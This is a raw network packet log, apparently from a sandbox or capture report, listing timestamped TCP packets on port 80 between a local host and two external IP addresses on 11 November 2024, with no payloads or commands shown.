                                                                                                                                                Nov 11, 2024 19:16:48.204252958 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204263926 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204279900 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204293013 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204303980 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204315901 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.204324007 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.204356909 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205056906 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205070019 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205080986 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205092907 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205125093 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205125093 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205468893 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205482006 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205497026 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205507994 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205517054 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205519915 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205528975 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205547094 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205554962 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205562115 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205569029 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205581903 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.205595016 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.205619097 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.206418037 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206430912 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206440926 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206458092 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206470013 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206480980 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206490993 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.206494093 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206507921 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206516027 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.206520081 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.206542969 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.206564903 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.207350969 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207362890 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207376003 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207386971 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207398891 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207401991 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.207411051 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207425117 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207436085 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.207442045 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.207442045 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.207473040 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.208205938 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208220005 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208230972 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208242893 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208255053 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208264112 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.208271980 CET804973192.114.2.230192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:48.208282948 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.208311081 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.211066008 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:48.211330891 CET4973180192.168.2.492.114.2.230
                                                                                                                                                Nov 11, 2024 19:16:50.129076004 CET4973280192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.134061098 CET804973277.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.134182930 CET4973280192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.134290934 CET4973280192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.143879890 CET804973277.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.157502890 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.162523985 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.162641048 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.162796974 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.167634010 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.185750961 CET804973277.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.185930014 CET4973280192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.806740046 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806777954 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806790113 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806826115 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806838036 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806849957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.806844950 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.806957960 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.806957960 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.807060957 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.807073116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.807085991 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.807121038 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.807360888 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.807404995 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.811742067 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.811819077 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.811831951 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.811868906 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.812000990 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.812057018 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.912008047 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912056923 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912070990 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912120104 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.912175894 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912250042 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.912272930 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912431955 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912442923 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912453890 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912477016 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.912508011 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.912781000 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912796021 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.912869930 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.913141966 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913285017 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913296938 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913350105 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.913558006 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913618088 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.913746119 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913758039 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913824081 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.913908005 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.913995028 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914006948 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914035082 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.914258003 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914271116 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914283037 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914308071 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.914346933 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:50.914870024 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914935112 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:50.914985895 CET4973380192.168.2.477.105.36.123
Nov 11, 2024 19:16:50.916975021 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:50.971869946 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:50.992889881 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.017949104 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.017996073 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018008947 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018028975 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018040895 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018054962 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018284082 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018300056 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018315077 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018326998 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018388033 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.018448114 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.018621922 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018663883 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.018784046 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018796921 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018846989 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.018974066 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018985033 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.018997908 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.019022942 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.019268036 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.019335032 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.019370079 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.019382000 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.019423008 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.019660950 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.019671917 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.019682884 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.019709110 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.019872904 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.019936085 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.020268917 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.020282030 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.020292997 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.020303965 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.020315886 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.020328045 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.020328045 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.020347118 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.020381927 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.020674944 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.020759106 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.020806074 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.020898104 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.020910025 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.020955086 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.021303892 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021315098 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021325111 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021337032 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021351099 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.021382093 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.021533012 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021656036 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021687031 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021697998 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021749973 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.021917105 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021944046 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.021959066 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021971941 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.021984100 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.022015095 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.022428036 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.022456884 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.023238897 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.023287058 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.023292065 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.023304939 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.023343086 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.058948040 CET  80     49731  92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:51.059092999 CET  49731  80     192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:51.059238911 CET  49731  80     192.168.2.4    92.114.2.230
Nov 11, 2024 19:16:51.064245939 CET  80     49731  92.114.2.230   192.168.2.4
Nov 11, 2024 19:16:51.098685026 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.098704100 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.098808050 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.123431921 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.123486996 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.123495102 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.123626947 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.123646975 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.123698950 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.123790026 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.123804092 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.123815060 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.123827934 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.123852015 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.123886108 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.124273062 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.124284983 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.124296904 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.124310017 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.124320984 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.124321938 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.124337912 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.124351978 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.124351025 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.124365091 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.124397993 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.124420881 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.125252008 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.125264883 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.125274897 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.125288010 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.125299931 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.125310898 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.125313997 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.125322104 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.125332117 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.125334978 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.125346899 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.125359058 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.125360966 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.125381947 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.125401020 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.126177073 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.126188993 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.126198053 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.126209021 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.126219988 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.126230955 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.126231909 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.126244068 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.126250029 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.126259089 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.126271963 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.126281977 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.126321077 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.127137899 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.127151966 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.127161980 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.127171993 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.127185106 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.127192020 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.127196074 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.127202034 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.127219915 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.127228022 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.127228022 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.127232075 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.127245903 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.127252102 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.127285957 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.128087997 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128101110 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128110886 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128123045 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128133059 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.128137112 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128149986 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128155947 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.128165007 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128176928 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128189087 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128191948 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.128209114 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.128247976 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.128973007 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128987074 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.128997087 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.129009008 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.129021883 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.129049063 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.129081011 CET  49733  80     192.168.2.4    77.105.36.123
Nov 11, 2024 19:16:51.129407883 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.129420996 CET  80     49733  77.105.36.123  192.168.2.4
Nov 11, 2024 19:16:51.129432917 CET  80     49733  77.105.36.123  192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129445076 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129456043 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129456997 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129487038 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129517078 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129853964 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129864931 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129879951 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129890919 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129900932 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129901886 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129914045 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129925966 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129937887 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129937887 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129951000 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129956961 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.129968882 CET804973377.105.36.123192.168.2.4
                                                                                                                                                Nov 11, 2024 19:16:51.129987955 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.130013943 CET4973380192.168.2.477.105.36.123
                                                                                                                                                Nov 11, 2024 19:16:51.130646944 CET804973377.105.36.123192.168.2.4
